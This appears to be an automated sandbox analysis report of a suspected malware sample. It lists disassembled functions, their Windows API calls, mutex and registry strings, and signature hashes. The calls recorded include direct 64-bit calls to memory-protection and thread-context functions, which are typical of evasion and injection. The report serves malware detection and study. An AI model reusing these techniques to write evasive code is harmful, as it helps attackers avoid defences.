                                                                            • X64Call.FILE(00000000,00000000,00000005,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 007C6475
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C6497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtProtectVirtualMemory
                                                                            • API String ID: 3570319994-1546459799
                                                                            • Opcode ID: 049e91ac863ddb2f74e8d12009f9ce4ccc2c47c0d5c28bbc9ad49d356574e380
                                                                            • Instruction ID: b6352e0a5fea8bfafc39717644692b77fa3cb1ad6477f03696760f20b482065a
                                                                            • Opcode Fuzzy Hash: 049e91ac863ddb2f74e8d12009f9ce4ccc2c47c0d5c28bbc9ad49d356574e380
                                                                            • Instruction Fuzzy Hash: 2221FCB0D10209AFDB18DF64EC46FBAB7F9FB88714F00852DE405A6251E7799A90CB64
                                                                            Function 007C6310 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtFreeVirtualMemory), ref: 007C6334
                                                                            • X64Call.FILE(00000000,00000000,00000004,?,?,?,00000000,?,00000000,?,00000000), ref: 007C639F
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C63C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtFreeVirtualMemory
                                                                            • API String ID: 3570319994-3923168862
                                                                            • Opcode ID: c018e92e0a8a3e0cb80e4fb47c86aa9a4c140e43979e5d1b86d633e89bf89d61
                                                                            • Instruction ID: 6ffa067fecd87cbecf0a9220610a82b3c6e470b61659f8bc422b589c1a792331
                                                                            • Opcode Fuzzy Hash: c018e92e0a8a3e0cb80e4fb47c86aa9a4c140e43979e5d1b86d633e89bf89d61
                                                                            • Instruction Fuzzy Hash: A5212CB1D00248EFDB14DF64DC86FBAB7F9FB88310F00892DE505A7250E6795984CBA1
                                                                            Function 007C6160 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtQueryVirtualMemory), ref: 007C6184
                                                                            • X64Call.FILE(00000000,00000000,00000006,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007C61F1
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C6213
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtQueryVirtualMemory
                                                                            • API String ID: 3570319994-66515852
                                                                            • Opcode ID: 1284652d45f3b70e0d088b41542c7e76531d85e2b10b150b40d75080ab5efc10
                                                                            • Instruction ID: 6c52253f232a30dbaf2de9664f6cb59fe6aab6e4ac35a2cef09b149f9c185be0
                                                                            • Opcode Fuzzy Hash: 1284652d45f3b70e0d088b41542c7e76531d85e2b10b150b40d75080ab5efc10
                                                                            • Instruction Fuzzy Hash: BF211DB1D14208EFEB14DF98DC86F7AB7B9FB84715F00841CF804A6291E77999808B61
                                                                            Function 007C6690 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtGetContextThread), ref: 007C66B4
                                                                            • X64Call.FILE(00000000,00000000,00000002,?,?,?,00000000), ref: 007C66F9
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C671B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtGetContextThread
                                                                            • API String ID: 3570319994-3545450881
                                                                            • Opcode ID: 175cad641ff95aa1613027ac19d3c2d93f6e3e796c64fd455bb8ed0112a2ce98
                                                                            • Instruction ID: d0bbf88174ec1e35060d4abaaeecb8580f81964b5d523c34e403cb0ba9fade50
                                                                            • Opcode Fuzzy Hash: 175cad641ff95aa1613027ac19d3c2d93f6e3e796c64fd455bb8ed0112a2ce98
                                                                            • Instruction Fuzzy Hash: E41161B5900208EFEB10EF74EC8AF69B7B8FB84315F10882DE905B6191E27959D0CF61
                                                                            Function 007C6740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtSetContextThread), ref: 007C6764
                                                                            • X64Call.FILE(00000000,00000000,00000002,?,?,?,00000000), ref: 007C67A9
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C67CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtSetContextThread
                                                                            • API String ID: 3570319994-3779410840
                                                                            • Opcode ID: 1155f587df4307f0467971020d2c789452f81509ab0dd4b7a2c108c2f94b13b8
                                                                            • Instruction ID: 88cbffc3ac22440c119917b8e2241daf9e6285669db94e43a85d18937925fa53
                                                                            • Opcode Fuzzy Hash: 1155f587df4307f0467971020d2c789452f81509ab0dd4b7a2c108c2f94b13b8
                                                                            • Instruction Fuzzy Hash: 4A118BB4900308EFDB10DFB4ED8AF69B3F8B788728F00492CE505A6241E3785D84AB20
                                                                            Function 007D645E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wcscat$FreeLocal__snwprintf
                                                                            • String ID: '%s'
                                                                            • API String ID: 3523142645-2201965518
                                                                            • Opcode ID: 88e070e171a2458baaa326da3059524500842fc2917b86a1527ea352c2880568
                                                                            • Instruction ID: b1fe80b979f6be4be71420e43b3f82f28a94aaf2930f9ed4ecc0609a51d954fd
                                                                            • Opcode Fuzzy Hash: 88e070e171a2458baaa326da3059524500842fc2917b86a1527ea352c2880568
                                                                            • Instruction Fuzzy Hash: 0C1139B094011CEBDB24DB40CCCDBEDB775AB64308F208299E1096B295D778AFC48B90
                                                                            Function 007C4700 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007C471F
                                                                            • RegGetValueW.ADVAPI32(80000001,?,{C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD},00000008,00000000,?,?), ref: 007C4750
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Value__snwprintf
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 3635966236-3800169908
                                                                            • Opcode ID: 4accfba26a17fbf1fb149999b1813bc30be4110ae2b6291ee3f2f6e1b09f5b27
                                                                            • Instruction ID: d961c95ef931937d89b885ed7c1347826c776992416a9e3dda9dc4f9f815adf6
                                                                            • Opcode Fuzzy Hash: 4accfba26a17fbf1fb149999b1813bc30be4110ae2b6291ee3f2f6e1b09f5b27
                                                                            • Instruction Fuzzy Hash: 1BF0AE71A40718FBD710DA65DC4AFE6B368EB84B01F004598BE19A6280F6F499544BD4
                                                                            Function 007D01B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007D0190
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D01A3
                                                                            • Sleep.KERNEL32(00000064), ref: 007D01AB
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007D0184
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleMutexOpenSleep
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2969294566-1719058712
                                                                            • Opcode ID: 4ddf9884a023d4941086b9cda5a2bc642321a54e49f6009070ef2e7d03cebae9
                                                                            • Instruction ID: 0988ee18b91f9b9795242fd94edd1efee4a446dc73b059bf5b6793fbef51961f
                                                                            • Opcode Fuzzy Hash: 4ddf9884a023d4941086b9cda5a2bc642321a54e49f6009070ef2e7d03cebae9
                                                                            • Instruction Fuzzy Hash: 7CE0B670A45309DBE714EBA0CE0DBAD7E70BB84745F201926B502B53D0C7BA8A00CBA2
                                                                            Function 007D0289 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007D0264
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D0277
                                                                            • Sleep.KERNEL32(00000064), ref: 007D027F
                                                                            • Sleep.KERNEL32(000003E8), ref: 007D0290
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007D0258
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2551712853-1719058712
                                                                            • Opcode ID: 2d15205e57dc88d0a58b4fff24cb203f8a5a215825e58d2a2a1d842160d2b3ba
                                                                            • Instruction ID: cde4d1dfc579d0fd40abee8a2a918f0abaee3de03aa478d470cbb75bd89e15f5
                                                                            • Opcode Fuzzy Hash: 2d15205e57dc88d0a58b4fff24cb203f8a5a215825e58d2a2a1d842160d2b3ba
                                                                            • Instruction Fuzzy Hash: A5E0B675A41304DBEB54ABA0C84DBDD7A71FB58715F286425F102B52D4CBBCA481CBA8
                                                                            Function 007D0368 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007D0343
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D0356
                                                                            • Sleep.KERNEL32(00000064), ref: 007D035E
                                                                            • Sleep.KERNEL32(000003E8), ref: 007D036F
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007D0337
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2551712853-1719058712
                                                                            • Opcode ID: 61e5a58b2a614c5e9e1aafdd3188d0ead1ee08e6b45e632f43b02a1a35907df8
                                                                            • Instruction ID: ea81548c43d3bee85df30e10522309ab4844b861dfe4c2e584abb54564315da3
                                                                            • Opcode Fuzzy Hash: 61e5a58b2a614c5e9e1aafdd3188d0ead1ee08e6b45e632f43b02a1a35907df8
                                                                            • Instruction Fuzzy Hash: 39E0B635A40304EBEB18ABA1E8597AD7A71FB44B01F50942DF112A52E4CFBC8401CF45
                                                                            Function 007D03D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007D03B0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D03C3
                                                                            • Sleep.KERNEL32(00000064), ref: 007D03CB
                                                                            • Sleep.KERNEL32(000003E8), ref: 007D03DC
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007D03A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2551712853-1719058712
                                                                            • Opcode ID: 5eec0a0673eaf5029d6f9c31781636104119ee307a5c6e2930922db4b7a26ab0
                                                                            • Instruction ID: bbaabc9b6366333db29708e9664b5b869dae6bdb081ec0934be908acd261f6f4
                                                                            • Opcode Fuzzy Hash: 5eec0a0673eaf5029d6f9c31781636104119ee307a5c6e2930922db4b7a26ab0
                                                                            • Instruction Fuzzy Hash: F3E0EC31A44314DBEB24AFA0DC0DBAD7A71BB44705F145429F102B52D4CBFD8802CB55
                                                                            Function 007DCC90 Relevance: 6.3, APIs: 5, Instructions: 48memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00009004), ref: 007DCC9D
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007DCCB7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCCEB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCD02
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCD0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 3098330729-0
                                                                            • Opcode ID: a13cea58707b1ca68227342086298fd3fa9b8ba20452e39ed00f0662890adc13
                                                                            • Instruction ID: 55f02124d54f233fb8d40a815990d53270f99ed6e0a9f8eded62a1783083c8bc
                                                                            • Opcode Fuzzy Hash: a13cea58707b1ca68227342086298fd3fa9b8ba20452e39ed00f0662890adc13
                                                                            • Instruction Fuzzy Hash: 8A110C75A00208FFDB05EFA8D849BAD7BB5FB48300F108599FA05A7391D6389A41DF58
                                                                            Function 007DE1A0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007DEBC0: LocalAlloc.KERNEL32(00000040,00000FA0), ref: 007DEC09
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007DE3F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocFreeLocalVirtual
                                                                            • String ID:
                                                                            • API String ID: 3333721195-0
                                                                            • Opcode ID: f0c7de8daa9e2c345c8034735aea8ccbf5e7632efb6290a9e818064b057fd548
                                                                            • Instruction ID: 05a4a7ce72de3df0955e0ba7d18c5c973733dd7642d0d836b0901db93744f787
                                                                            • Opcode Fuzzy Hash: f0c7de8daa9e2c345c8034735aea8ccbf5e7632efb6290a9e818064b057fd548
                                                                            • Instruction Fuzzy Hash: BF91A474E00209DFCB15DF98C984AADFBB2FF48304F24855AE816AB355D738A992CF54
